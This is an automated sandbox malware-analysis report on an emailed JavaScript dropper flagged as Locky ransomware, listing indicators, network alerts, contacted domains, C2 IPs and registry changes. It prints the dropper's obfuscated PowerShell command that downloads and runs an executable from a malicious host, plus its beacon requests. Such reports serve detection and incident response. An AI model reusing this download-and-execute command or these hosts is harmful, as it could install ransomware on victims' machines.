EMAIL_98089542916705_rcook.zip
This report was generated from a file or URL submitted to this webservice on October 22nd 2016 07:11:29 (UTC), using the action script "Heavy Anti-Evasion".
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v5.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Ransomware
  - Changes the desktop background picture
  - Contacts a domain associated with Tor hidden services
- Spyware
  - Accesses potentially sensitive information from local browsers
  - POSTs files to a webserver
- Persistence
  - Spawns a lot of processes
- Fingerprint
  - Contains ability to lookup the windows account name
  - Reads the active computer name
  - Reads the cryptographic machine GUID
  - Reads the windows installation date
- Evasive
  - Executes WMI queries known to be used for VM detection
- Network Behavior
  - Contacts 17 domains and 7 hosts.
Additional Context
Related Sandbox Artifacts
- Associated SHA256s
- 7b870353dada7342ddf56a67da555b78aa54c9e6d4dff2163777ae75b808d3a2
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators (15)

Anti-Detection/Stealthiness

Writes to a desktop.ini file (often used to cloak folders)
- details:
"eXe" wrote 67 bytes to file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\PQHTF1QU\desktop.ini" (Byte Offset: 0): [.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
"eXe" wrote 67 bytes to file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\8RONKGG2\desktop.ini" (Byte Offset: 0): [.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
"eXe" wrote 67 bytes to file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\HBYD8AA4\desktop.ini" (Byte Offset: 0): [.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
"eXe" wrote 67 bytes to file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q15V3B25\desktop.ini" (Byte Offset: 0): [.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
- source: API Call
- relevance: 3/10

External Systems

Detected Emerging Threats Alert
- details:
Detected alert "ET TROJAN ABUSE.CH Locky Payment Domain Detected" (SID: 2023329, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN Locky CnC checkin Aug 03 2016" (SID: 2821471, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN Locky CnC checkin Aug 03 2016 M2" (SID: 2821569, Rev: 5, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN Ransomware Locky CnC Beacon Oct 3" (SID: 2822473, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 2, Severity: 1) categorized as "Potential Corporate Privacy Violation"
- source: Suricata Alerts
- relevance: 10/10

Sample was identified as malicious by at least one Antivirus engine
- details: 8/54 Antivirus vendors marked sample as malicious (14% detection rate)
- source: External System
- relevance: 8/10

Network Related

Contacts a domain associated with Tor hidden services
- details:
"jhomitevd2abj3fk.onion.to"
"jhomitevd2abj3fk.tor2web.org" - source
- Network Traffic
- relevance
- 9/10
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "91.200.14.124" (ASN: 35804, Owner: PP SKS-Lugan): ...
URL: http://91.200.14.124/apache_handler.php (AV positives: 1/68 scanned on 10/18/2016 03:08:15)
File SHA256: 68c53f0f091fcc898f5926e6d2fdeba5106bc995aab600f51339dbdec666808d (AV positives: 44/57 scanned on 10/21/2016 03:51:13)
Found malicious artifacts related to "185.102.136.77" (ASN: , Owner: ): ...
File SHA256: 68c53f0f091fcc898f5926e6d2fdeba5106bc995aab600f51339dbdec666808d (AV positives: 44/57 scanned on 10/21/2016 03:51:12)
Found malicious artifacts related to "52.84.13.157" (ASN: , Owner: ): ...
- source: Network Traffic
- relevance: 10/10

Ransomware/Banking

Detected text artifact in screenshot that indicates file is ransomware
- details:
"m.,dz'_1rd,_omitevd2ab-3fk.tor2web.or" (Source: screen_4.png, Indicator: "tor2web")
"decrypt" (Source: screen_4.png, Indicator: "decrypt") - source
- String
- relevance
- 8/10
-
Detected text artifact in screenshot that indicate file is ransomware
-
Spyware/Information Retrieval
-
Accesses potentially sensitive information from local browsers
- details
-
"eXe" had access to "%APPDATA%\Microsoft\Windows\Cookies\index.dat" (Type: "FileHandle")
"eXe" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5\index.dat" (Type: "FileHandle") - source
- Touched Handle
- relevance
- 5/10
-
Accesses potentially sensitive information from local browsers
-
Unusual Characteristics
-
Contains ability to reboot/shutdown the operating system
- details
-
ExitWindowsEx@USER32.DLL from PID 00002708
ExitWindowsEx@USER32.DLL from PID 00000600
- source: Hybrid Analysis Technology
- relevance: 5/10

Script connects to a host without prior DNS lookup
- details:
Process "eXe" connected to "91.200.14.124" (Port: 52045, Protocol: TCP) without a DNS lookup
Process "eXe" connected to "185.102.136.77" (Port: 52046, Protocol: TCP) without a DNS lookup
Process "eXe" connected to "91.200.14.124" (Port: 52047, Protocol: TCP) without a DNS lookup
Process "eXe" connected to "185.102.136.77" (Port: 52048, Protocol: TCP) without a DNS lookup
Process "eXe" connected to "91.200.14.124" (Port: 52049, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "54.210.161.120" (Port: 52061, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "104.101.209.66" (Port: 52062, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "52.32.150.180" (Port: 52063, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "72.21.91.29" (Port: 52064, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "52.84.13.157" (Port: 52065, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "192.122.185.121" (Port: 52066, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "216.58.192.174" (Port: 52067, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "192.122.185.123" (Port: 52068, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "52.33.248.56" (Port: 52069, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "72.21.91.29" (Port: 52070, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "63.245.215.95" (Port: 52071, Protocol: TCP) without a DNS lookup
- source: Monitored Target
- relevance: 10/10

Script file shows a combination of malicious behavior
- details: The script produces internet activity, is obfuscated and/or drops files
- source: Indicator Combinations
- relevance: 7/10

Spawns a lot of processes
- details:
Spawned process "wscript.exe" with commandline ""C:\BILL_4531.js""
Spawned process "cmd.exe" with commandline "/c p^oWer^sh^eLL.e^Xe ^-^eXecUtiOnPoLi^cY Byp^a^ss^ -^nO^PROFil^e^ -w^iNdOw^sty^Le^ hidd^en^ (New^-oBJect S^Ys^te^m^.^Net^.W^e^Bcl^I^ent).dO^w^nlOadfile(^'http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe');st^art^-p^R^Oc^eSs^ %APPDATA%\eXe"
Spawned process "powershell.exe" with commandline "poWersheLL.eXe -eXecUtiOnPoLicY Bypass -nOPROFile -wiNdOwstyLe hidden (New-oBJect SYstem.Net.WeBclIent).dOwnlOadfile('http://www.injusticeil.top/user.php?f=2.dat','%APPDATA%\eXe');start-pROceSs %APPDATA%\eXe"
Spawned process "eXe"
Spawned process "eXe"
Spawned process "cmd.exe" with commandline "/C del /Q /F "%TEMP%\sysE5A3.tmp""
Spawned process "helper.exe" with commandline "/SetAsDefaultAppUser"
- source: Monitored Target
- relevance: 8/10

4 further malicious indicators are hidden (available only in the private webservice or standalone version).

Suspicious Indicators (26)

Anti-Detection/Stealthiness

Sets the process error mode to suppress error box
- details:
"wscript.exe" set its error mode to SEM_NOOPENFILEERRORBOX
"helper.exe" set its error mode to SEM_NOOPENFILEERRORBOX - source
- API Call
- relevance
- 8/10
-
Sets the process error mode to suppress error box
-
Environment Awareness
-
Reads the cryptographic machine GUID
- details
-
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"firefox.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID") - source
- Registry Access
- relevance
- 10/10
-
Reads the windows installation date
- details
- "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
- source
- Registry Access
- relevance
- 10/10
-
Reads the cryptographic machine GUID
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET DNS Query to a *.pw domain - Likely Hostile" (SID: 2016778, Rev: 4, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET POLICY DNS Query to .onion proxy Domain (tor2web)" (SID: 2015576, Rev: 7, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET POLICY DNS Query to .onion proxy Domain (onion.to)" (SID: 2020116, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
- source: Suricata Alerts
- relevance: 10/10

General

Contains ability to find and load resources of a specific module
- details:
LoadResource@KERNEL32.DLL from PID 00001264
FindResourceExW@KERNEL32.DLL from PID 00001264
- source: Hybrid Analysis Technology
- relevance: 1/10

POSTs files to a webserver
- details:
"POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://91.200.14.124/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.200.14.124
Content-Length: 561
Connection: Keep-Alive" with no payload
"POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://185.102.136.77/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 185.102.136.77
Content-Length: 561
Connection: Keep-Alive" with no payload
- source: Network Traffic
- relevance: 5/10

Reads configuration files
- details:
"wscript.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini"
"eXe" read file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\PQHTF1QU\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8RONKGG2\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HBYD8AA4\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q15V3B25\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D0YDZTO5\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E9S7QCHY\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QA0UPEJW\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S9Y0GKU4\desktop.ini"
"helper.exe" read file "C:\Users\desktop.ini"
"helper.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini"
"helper.exe" read file "%PROGRAMFILES%\desktop.ini" - source
- API Call
- relevance
- 4/10
-
Contains ability to find and load resources of a specific module
-
Installation/Persistance
-
Drops executable files
- details
-
"gmpopenh264.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"Roaming.eXe" has type "PE32 executable (GUI) Intel 80386 for MS Windows Nullsoft Installer self-extracting archive" - source
- Extracted File
- relevance
- 10/10
-
Writes a PE file header to disc
- details
-
"eXe" wrote 11776 bytes starting with PE header signature to file "%TEMP%\nsa2FE8.tmp\System.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
"helper.exe" wrote 11264 bytes starting with PE header signature to file "%TEMP%\nsrDEA2.tmp\System.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
"helper.exe" wrote 32768 bytes starting with PE header signature to file "%TEMP%\nsrDEA2.tmp\CityHash.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
"helper.exe" wrote 4608 bytes starting with PE header signature to file "%TEMP%\nsrDEA2.tmp\AppAssocReg.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
"helper.exe" wrote 4608 bytes starting with PE header signature to file "%TEMP%\nsrDEA2.tmp\ShellLink.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ... - source
- source: API Call
- relevance: 10/10

Network Related

Found potential IP address in binary/memory
- details:
"91.200.14.124"
"185.102.136.77"
Heuristic match: "?OpenH264 version:1.3.0.0"
- source: String
- relevance: 3/10

Ransomware/Banking

Changes the desktop background picture
- details:
"eXe" (Access type: "SETVAL"; Path: "HKCU\CONTROL PANEL\DESKTOP"; Key: "WALLPAPERSTYLE"; Value: "30000000")
"eXe" (Access type: "SETVAL"; Path: "HKCU\CONTROL PANEL\DESKTOP"; Key: "TILEWALLPAPER"; Value: "30000000") - source
- Registry Access
- relevance
- 10/10
-
Changes the desktop background picture
-
Spyware/Information Retrieval
-
Contains ability to open the clipboard
- details
-
OpenClipboard@USER32.DLL from PID 00002708
OpenClipboard@USER32.DLL from PID 00000600
- source: Hybrid Analysis Technology
- relevance: 10/10

System Destruction

Marks file for deletion
- details:
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nscDDF6.tmp" for deletion
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nsrDEA2.tmp" for deletion
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nsrDEA2.tmp\AppAssocReg.dll" for deletion
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nsrDEA2.tmp\CityHash.dll" for deletion
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nsrDEA2.tmp\ShellLink.dll" for deletion
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nsrDEA2.tmp\System.dll" for deletion - source
- API Call
- relevance
- 10/10
-
Opens file with deletion access rights
- details
-
"helper.exe" opened "%TEMP%\nscDDF6.tmp" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp\AppAssocReg.dll" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp\CityHash.dll" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp\ShellLink.dll" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp\System.dll" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp\" with delete access - source
- API Call
- relevance
- 7/10
-
Marks file for deletion
-
System Security
-
Modifies proxy settings
- details
-
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"eXe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"eXe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"eXe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE") - source
- Registry Access
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
"powershell.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK") - source
- Registry Access
- relevance
- 8/10
-
Modifies proxy settings
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"powershell.exe" wrote bytes "8a9b0b94" to virtual address "0x6AB31FDC" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "92e6047779a80977be720977d62d09771de2047705a20977bee30477616f0977684107770050077700000000ad37b5758b2db575b641b57500000000" to virtual address "0x746A1000" (part of module "WSHTCPIP.DLL")
"powershell.exe" wrote bytes "4053077758580877186a0877653c09770000000000bfd5760000000056ccd576000000007ccad57600000000376833756a2c0977d62d097700000000206933750000000029a6d57600000000a48d337500000000f70ed57600000000" to virtual address "0x759A1000" (part of module "NSI.DLL")
"powershell.exe" wrote bytes "7739057779a80977be720977d62d09771de2047705a20977c868087757d10f77bee30477616f0977684107770050077700000000ad37b5758b2db575b641b57500000000" to virtual address "0x74BC1000" (part of module "WSHIP6.DLL")
"powershell.exe" wrote bytes "0857e2750478eb750000000051c11c7794981c77ee9c1c7775dc1e77273e1e77efb222770000000046ced576013dd67638edd676cfcdd5763123d576de2fd676c4cad57680bbd57652bad5769fbbd57692bbd57646bad5760abfd57600000000" to virtual address "0x67E61000" (part of module "SHFOLDER.DLL")
"eXe" wrote bytes "4d37d676f99cd57678ebd4761861d776fa8bd476d333d6760e45d676a41dd676d0d9d576e8d9d576013cd676e19cd5762b45d676b62fd6764123d57600bfd576000000006d42b07600000000ec22bf7699e5bc7600000000" to virtual address "0x10003000" (part of module "SYSTEM.DLL")
"eXe" wrote bytes "0857e2750478eb750000000051c11c7794981c77ee9c1c7775dc1e77273e1e77efb222770000000046ced576013dd67638edd676cfcdd5763123d576de2fd676c4cad57680bbd57652bad5769fbbd57692bbd57646bad5760abfd57600000000" to virtual address "0x6B271000" (part of module "SHFOLDER.DLL")
"eXe" wrote bytes "c2000000" to virtual address "0x1000405C" (part of module "SYSTEM.DLL")
"eXe" wrote bytes "92e6047779a80977be720977d62d09771de2047705a20977bee30477616f0977684107770050077700000000ad37b5758b2db575b641b57500000000" to virtual address "0x746A1000" (part of module "WSHTCPIP.DLL")
"eXe" wrote bytes "4053077758580877186a0877653c09770000000000bfd5760000000056ccd576000000007ccad57600000000376833756a2c0977d62d097700000000206933750000000029a6d57600000000a48d337500000000f70ed57600000000" to virtual address "0x759A1000" (part of module "NSI.DLL")
"eXe" wrote bytes "7739057779a80977be720977d62d09771de2047705a20977c868087757d10f77bee30477616f0977684107770050077700000000ad37b5758b2db575b641b57500000000" to virtual address "0x74BC1000" (part of module "WSHIP6.DLL")
"helper.exe" wrote bytes "e19cd576f99cd57678ebd47600bfd576fa8bd4761861d776d333d6760e45d676e74bd776e8d9d576eba8d576013cd6764d37d6762b45d676b62fd6764123d576d0d9d576000000006d42b0760000000099e5bc76ec22bf7600000000" to virtual address "0x10003000" (part of module "SYSTEM.DLL")
"helper.exe" wrote bytes "0857e2750478eb750000000051c11c7794981c77ee9c1c7775dc1e77273e1e77efb222770000000046ced576013dd67638edd676cfcdd5763123d576de2fd676c4cad57680bbd57652bad5769fbbd57692bbd57646bad5760abfd57600000000" to virtual address "0x6B041000" (part of module "SHFOLDER.DLL")
"helper.exe" wrote bytes "002100000c2100001a210000282100003421000040210000000000005c210000000000007421000000000000" to virtual address "0x006D2000" (part of module "RPCSS.DLL")
"helper.exe" wrote bytes "c2000000" to virtual address "0x10004020" (part of module "SYSTEM.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
-
"wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"firefox.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409") - source
- Registry Access
- relevance
- 3/10
-
Installs hooks/patches the running process
-
Hiding 8 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 25
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
- SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00001264
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Contains ability to query machine time
- details
- GetSystemTimeAsFileTime@KERNEL32.DLL from PID 00001264
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the machine version
- details
-
GetVersionExA@KERNEL32.DLL from PID 00001264
GetVersionExA@KERNEL32.DLL from PID 00001264
GetVersion@KERNEL32.DLL from PID 00002708
GetVersion@KERNEL32.DLL from PID 00000600
GetVersionExW@KERNEL32.DLL from PID 00000600
- source: Hybrid Analysis Technology
- relevance: 1/10

Contains ability to query volume size
- details:
GetDiskFreeSpaceW@KERNEL32.DLL from PID 00002708
GetDiskFreeSpaceW@KERNEL32.DLL from PID 00000600
- source: Hybrid Analysis Technology
- relevance: 3/10

Executes WMI queries
- details: "firefox.exe" issued a query "SELECT * FROM Win32_BIOS0"
- source: API Call
- relevance: 10/10

Possibly tries to detect the presence of a debugger
- details:
GetProcessHeap@KERNEL32.DLL from PID 00001264
GetProcessHeap@KERNEL32.DLL from PID 00001264
- source: Hybrid Analysis Technology
- relevance: 1/10

General

Contacts domains
- details:
"www.injusticeil.top"
"ciscobinary.openh264.org"
"dsybuxulplscgeonv.xyz"
"yitmxwhryykuuj.click"
"taulmkeuktvxhe.xyz"
"tyoycmkymaty.pl"
"jhomitevd2abj3fk.onion.to"
"udynanrpxqbxrosop.click"
"jrhkejh.click"
"ovpgfkt.info"
"www.torproject.org"
"jbajudsmkrurhnyu.pl"
"jdptstkrjiowdqvgi.pw"
"jhomitevd2abj3fk.tor2web.org"
"en.wikipedia.org"
"pccwuntpqx.click"
"efympeet.xyz" - source
- source: Network Traffic
- relevance: 1/10

Contacts server
- details:
"172.245.9.41:80"
"91.200.14.124:80"
"185.102.136.77:80"
"52.32.150.180:443"
"52.84.13.157:443"
"192.122.185.121:443"
"192.122.185.123:443" - source
- source: Network Traffic
- relevance: 1/10

Contains PDB pathways
- details: "wscript.pdb"
- source: String
- relevance: 1/10

Creates a writable file in a temporary directory
- details:
"helper.exe" created file "%TEMP%\nsrDEA2.tmp\System.dll"
"helper.exe" created file "%TEMP%\nsrDEA2.tmp\CityHash.dll"
"helper.exe" created file "%TEMP%\nsrDEA2.tmp\AppAssocReg.dll"
"helper.exe" created file "%TEMP%\nsrDEA2.tmp\ShellLink.dll" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\.net clr networking"
"\Sessions\1\BaseNamedObjects\RasPbFile"
"\Sessions\1\BaseNamedObjects\{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}"
"\Sessions\1\BaseNamedObjects\_SHuassist.mtx"
"\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
"\Sessions\1\BaseNamedObjects\Local\c:!users!upw9lua!appdata!roaming!microsoft!windows!cookies!"
"\Sessions\1\BaseNamedObjects\Local\c:!users!upw9lua!appdata!local!microsoft!windows!history!history.ie5!"
"\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
"\Sessions\1\BaseNamedObjects\Local\c:!users!upw9lua!appdata!local!microsoft!windows!temporary internet files!content.ie5!" - source
- source: Created Mutant
- relevance: 3/10

Drops files marked as clean
- details: Antivirus vendors marked dropped file "gmpopenh264.dll" as clean (type is "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows")
- source: Extracted File
- relevance: 10/10

Launches a browser
- details: Launches browser "firefox.exe"
- source: Monitored Target
- relevance: 3/10

Loads the .NET runtime environment
- details: "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll" at 69F90000
- source: Loaded Module

Parsed Javascript
- details:
Output:
var vimzimfy = "ibu";
var ugbuts = 'hucviqidlo';
var dbaxanzi = 'h';
function alsosj() {
var tegi = false;
return tegi;
}
function qzibxijdeqo() {
var ybitk = undefined;
return ybitk;
}
function bycy() {
var twysaw = "64916";
return twysaw;
}
var mkolcive = false;
function fdutvax() {
var ivew = '82738';
return ivew;
}
function zhavutfi() {
return 15.0474;
}
var yjcewp = "%";
var npobwus = ".";
function ukotyfsug() {
return 1;
}
var aqmery = 'replace';
var ubhogy = 'c';
function xocygcah() {
var woqazlohj = 11;
return woqazlohj;
}
var vyrajtyju = 65.647;
function ycwywbarm() {
return 0;
}
function pjipukyzz() {
var dymiko = 13.6;
return dymiko;
}
function hafutw() {
return undefined;
}
var afdih = null;
function qoqkotsy() {
var zulgosjil = undefined;
return zulgosjil;
}
var utany = null;
function immoffunha() {
var varhach = null;
return varhach;
}
var lerlerkytu = typeof document;
function imsaw() {
return "upima";
}
function buzapm() {
return true;
}
function ghisolpy() {
return 0;
}
jkobeqivh = "ypbatkod";
var imekpajwob = 75;
function hyxi() {
return "92466";
}
var ibxesno = 'm';
function wyvun() {
return undefined;
}
var ajrahh = ')';
var noxah = "d";
vgyxpekxo = 'rwyxzebxuxk';
var uquhiwn = ':';
function avompavwir() {
return 1;
}
var jlyzifhuxc = "arqozy";
function ylqeful() {
return '70180';
}
function evwybo() {
return 0;
}
var fafiq = "'";
var etfygfaqy = null;
function osyqqorvalq() {
return "6880";
}
var efyfis = 't';
var dfewtolkybnu = 'vleqcivykn';
pvydinoko = '84641';
function mmysse() {
var ggefritjy = 17.5;
return ggefritjy;
}
var geju = "a";
function mkiwo() {
var ehowh = 25.1654;
return ehowh;
}
styrocyzvy = 'ewcocc';
var xxiccufuxby = null;
var yzfotdynasw = 1;
var ohug = undefined;
var ypedhycw = 'e';
var naccexgi = false;
var ucuxju = undefined;
var ikwucelfy = 'alyfmixamz';
var olupa = "dunyqxygr";
var jyxtiw = "^";
var iwugdiwx = 5.855;
var zbike = '(';
function iwkydciti() {
return undefined;
}
function exvihve() {
var ocvami = false;
return ocvami;
}
var jisvapax = 1.671;
var upqetp = 1;
var alucra = "yvfiq";
var ilavhys = null;
function anar() {
return undefined;
}
function ytxobo() {
var ekryzsoj = 8.654;
return ekryzsoj;
}
function bagef() {
return 'jcyd';
}
function oqgovajo() {
var ucopkuxmi = null;
return ucopkuxmi;
}
var izgyjgipso = undefined;
function evulon() {
var izfafex = false;
return izfafex;
}
function zcagyl() {
return null;
}
function ocuqga() {
var zede = false;
return zede;
}
